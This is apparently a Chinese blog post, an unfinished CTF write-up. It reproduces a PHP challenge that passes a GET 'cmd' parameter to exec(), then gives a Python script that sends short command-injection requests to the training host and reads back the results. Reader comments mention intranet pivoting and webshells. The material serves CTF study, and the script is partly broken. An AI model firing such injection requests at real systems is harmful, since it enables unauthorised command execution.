一个做不来的WEb题目

作者: print("") 分类: 信息安全 发布时间: 2018-06-20 17:47

一个做不来的WEb题目

https://473831530.trains.virzz.com/

<?php
    error_reporting(0);
    /**
     * 
     * Hint: CTF都没打过或者Writeups都没有观摩过,加什么群?
     * 
     */
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    mkdir($sandbox);
    chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 20) {
        exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

然后看到crazy 和life 老哥发了一篇文章给我。唔。

https://www.anquanke.com/post/id/87203

看到这个文章之后,贼tmd 牛皮。牛皮牛皮。

然后一直改不来py 后面life 大黑阔提醒了一下,唔。不要再这个沙盒里面去测试。而是跳到上层。唔,

改出了一个垃圾py

# -*- coding:utf8 -*-
import requests as r
import hashlib
url = 'https://473831530.trains.virzz.com'
# 查询自己的IP
ip = r.get('http://ipv4.icanhazip.com/').text.strip()
sandbox = url + 'sandbox/' + hashlib.md5('orange' + ip).hexdigest() + '/'
 
reset = url + '?reset'
cmd = url + '?cmd='

build2=['ls ../ >../23.txt','ls >../10.txt','whoami >../12.txt']
print build2
for i in build2:
    s = r.get(cmd + i)
    print '[%s]' % s.status_code, s.url

s=r.get('https://473831530.trains.virzz.com/sandbox/23.txt')
print s.text

有趣,有趣,还要内网渗透。真的这么6的么、后续发吧

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

7
说点什么

avatar
5 Comment threads
2 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
5 Comment authors
hahaprint("")meo9ykratos13Ling Recent comment authors
  Subscribe  
最新 最旧 得票最多
提醒
13Ling
游客
13Ling

楼主,你的代码我用不了,提示第四行有问题,可以解疑一下吗?

kratos
游客
kratos

https://www.anquanke.com/post/id/87203 这个网址里面用的是什么工具啊

meo9y
游客
meo9y

大佬,求出内网渗透。webshell会传的。

haha
游客
haha

dalao 我内网扫了半天没思路能提示下不